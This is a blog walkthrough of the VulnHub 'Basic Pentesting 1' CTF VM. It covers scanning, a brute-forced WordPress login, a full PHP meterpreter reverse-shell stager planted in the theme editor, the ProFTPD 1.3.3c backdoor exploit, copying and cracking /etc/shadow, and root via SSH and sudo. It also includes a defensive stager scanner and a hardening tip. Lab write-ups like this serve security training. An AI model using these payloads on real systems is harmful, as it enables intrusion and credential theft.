Friday, 28 February 2020

Solution to the csec CTF



On Sunday afternoon I was bored and decided to do a quick, easy VulnHub CTF. This time it was csec, Basic Pentesting 1, although in reality it took me a little over an hour. You can download it from here:

https://www.vulnhub.com/entry/basic-pentesting-1,216/

The attacking machine's IP will be 192.168.1.56.

First, we scan the whole network:

nmap -sS -sV -O 192.168.1.0/24

Nmap scan report for vtcsec.home (192.168.1.85)
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:AD:0D:CB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Good, we have discovered that our victim's IP is 192.168.1.85.

We open the web page.

Next we run a directory scan:

dirb http://192.168.1.85 -o dirb


-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb
START_TIME: Sun Feb 16 18:37:29 2020
URL_BASE: http://192.168.1.85/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.85/ ----
+ http://192.168.1.85/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.1.85/secret/
+ http://192.168.1.85/server-status (CODE:403|SIZE:300)

---- Entering directory: http://192.168.1.85/secret/ ----
+ http://192.168.1.85/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/
==> DIRECTORY: http://192.168.1.85/secret/wp-content/
==> DIRECTORY: http://192.168.1.85/secret/wp-includes/
+ http://192.168.1.85/secret/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.1.85/secret/wp-admin/ ----
+ http://192.168.1.85/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/css/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/images/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/includes/
+ http://192.168.1.85/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/js/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/network/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/user/

---- Entering directory: http://192.168.1.85/secret/wp-content/ ----
+ http://192.168.1.85/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.85/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.1.85/secret/wp-content/themes/

---- Entering directory: http://192.168.1.85/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/network/ ----
+ http://192.168.1.85/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.85/secret/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.85/secret/wp-admin/user/ ----
+ http://192.168.1.85/secret/wp-admin/user/admin.php (CODE:503|SIZE:288)
+ http://192.168.1.85/secret/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.85/secret/wp-content/plugins/ ----
+ http://192.168.1.85/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.85/secret/wp-content/themes/ ----
+ http://192.168.1.85/secret/wp-content/themes/index.php (CODE:200|SIZE:0)

-----------------
END_TIME: Sun Feb 16 18:37:57 2020
DOWNLOADED: 36896 - FOUND: 13

In the secret subdirectory there is a blog.

Judging by the subdirectories, this blog is built on WordPress, so let's look at its vulnerabilities:

wpscan --url http://192.168.1.85/secret --enumerate u --output wpscan1

We get the following output:

WordPress Security Scanner by the WPScan Team
Version 3.7.5
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.1.85/secret/
[+] Started: Sun Feb 16 18:43:21 2020

Interesting Finding(s):

[+] http://192.168.1.85/secret/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.1.85/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.1.85/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.85/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://192.168.1.85/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.13 identified (Latest, released on 2019-12-12).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.1.85/secret/, Match: '-release.min.js?ver=4.9.13'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.85/secret/, Match: 'WordPress 4.9.13'

[i] The main theme could not be detected.

[i] User(s) Identified:

[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.

[+] Finished: Sun Feb 16 18:43:23 2020
[+] Requests Done: 61
[+] Cached Requests: 5
[+] Data Sent: 12.369 KB
[+] Data Received: 14.531 MB
[+] Memory used: 100.761 MB
[+] Elapsed time: 00:00:02

We see there is one user, admin.

We create a file with the users found, in this case just admin:

echo admin > admin.txt

Now we run a brute-force attack:

wpscan --url http://192.168.1.85/secret --usernames admin.txt --passwords /usr/share/wordlists/metasploit/unix_passwords.txt

[…]

[+] Performing password attack on Wp Login against 1 user/s
Trying admin / admin Time: 00:00:00 <=============> (5 / 5) 100.00% Time: 00:00:00
[SUCCESS] - admin / admin

[…]

Good, the password is admin.

We go to the administration directory.

We enter the username and password, admin and admin.

We go to Appearance → Themes → Editor and select index.php.


Now let's create a reverse shell in PHP:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=3333 -f raw > shell.php

We edit the generated file so that it looks exactly as shown:

/**/ error_reporting(0); $ip = '192.168.1.56'; $port = 3333; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

We paste this code into index.php.

We press the Update File button.
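As an added defender-side example (not part of the original post), a scanner that walks a WordPress theme tree looking for the traits of the PHP meterpreter stager pasted into index.php above; the indicator names, the fixture files and the theme name "theme-a" are constructed here.

```python
import os
import re
import tempfile

# Traits of the PHP stager used above: open a socket, read a length-prefixed
# blob, hand it to eval(), all with error reporting silenced.
INDICATORS = {
    "socket_open": re.compile(r"\b(stream_socket_client|fsockopen|socket_create)\s*\("),
    "socket_read": re.compile(r"\b(fread|socket_read)\s*\("),
    "dynamic_eval": re.compile(r"\b(eval|create_function)\s*\("),
    "length_prefix": re.compile(r"\bunpack\s*\(\s*['\"]N"),
    "errors_silenced": re.compile(r"\berror_reporting\s*\(\s*0\s*\)"),
}

def stager_indicators(php_source):
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(php_source)]

def scan_php_tree(root, min_hits=3):
    """Walk a theme/plugin directory; map relative path -> indicators for files
    that trip at least min_hits of them (a normal template trips none)."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = stager_indicators(fh.read())
            if len(hits) >= min_hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

# Constructed fixtures: a normal theme template and an index.php carrying the
# same kind of fragments as the stager pasted in through the theme editor.
CLEAN_PHP = "<?php get_header(); ?>\n<p>Hello</p>\n<?php get_footer(); ?>\n"
BACKDOORED_PHP = ("<?php /**/ error_reporting(0); $s = stream_socket_client('tcp://"
                  "192.0.2.1:3333'); $len = fread($s, 4); $a = unpack('Nlen', $len); eval($b);")

def demo():
    """Build a throw-away theme tree (name 'theme-a' is made up) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "theme-a")
        os.makedirs(theme)
        with open(os.path.join(theme, "index.php"), "w") as fh:
            fh.write(BACKDOORED_PHP)
        with open(os.path.join(theme, "page.php"), "w") as fh:
            fh.write(CLEAN_PHP)
        return scan_php_tree(root)
```

Adding define('DISALLOW_FILE_EDIT', true); to wp-config.php removes the in-dashboard theme editor used here, so a guessed admin password no longer turns directly into a file write.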

We start Metasploit:

msfconsole

We enter the options:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 3333
LPORT => 3333
msf5 exploit(multi/handler) > set ExitOnSession False
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:3333
msf5 exploit(multi/handler) >

In another browser tab we enter:

And in our Metasploit window the following happens:

We're in.

We'll open a shell:

meterpreter > shell

Process 1408 created.
Channel 0 created.

Let's check who we are:

whoami
www-data

So we are the www-data user.

Let's see which GNU/Linux version we are on:

uname -r
4.10.0-28-generic

cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"

If we go to the /home directory we find a folder called marlinspike, so that must be a user.

In fact, we have permission to see what is inside:

ls
046e85f6fe460de94fd46198feef4d07-backdoored_proftpd-1.3.3c.tar.gz
046e85f6fe460de94fd46198feef4d07-backdoored_proftpd-1.3.3c.tar.gz.bak
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backdoored_proftpd-1.3.3c
examples.desktop
latest.tar.gz
proftpd-1.3.3c
proftpd-1.3.3c.tar.bz2
proftpd-1.3.3c.tar.bz2.bak
wordpress

We notice proftpd-1.3.3c; this is a version of the FTP server that was infected with a backdoor. We could download the exploit and use it, but in our case we will use the Metasploit module. To do that, we leave the shell:

exit
meterpreter >

We use background to return to Metasploit:

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) >

msf5 exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show targets

Exploit targets:

Id Name
-- ----
0 Automatic


msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.1.85
RHOSTS => 192.168.1.85
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.1.56:4444
[*] 192.168.1.85:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7zz0sztruywJukhx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "7zz0sztruywJukhx\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.1.56:4444 -> 192.168.1.85:44476) at 2020-02-17 11:53:03 +0100

whoami
root

So now we are system administrators.

Let's try to get the users' passwords:
mkdir /var/www/html/secret/passwords
cp /etc/passwd* /var/www/html/secret/passwords
cp /etc/shadow /var/www/html/secret/passwords

cd /var/www/html/secret/passwords

tar cvfz passwords.tar.gz *
passwd
passwd-
shadow

In another terminal:

We download the files.

We decompress them:
tar xvfz passwords.tar.gz

Now we crack the password:

root@kali:~/csec# john shadow
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2020-02-17 12:28) 3.571g/s 28.57p/s 28.57c/s 28.57C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed

As we saw in the nmap output, there is also an SSH server running, so we can log in from there:

root@kali:~/csec# ssh marlinspike@192.168.1.85
marlinspike@192.168.1.85's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

608 packages can be updated.
445 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

marlinspike@vtcsec:~$

Now let's switch to Ubuntu's root account. For this we use sudo -i, which prompts for the password:

marlinspike@vtcsec:~/Documents$ sudo -i
[sudo] password for marlinspike:
root@vtcsec:~#

And we're done.





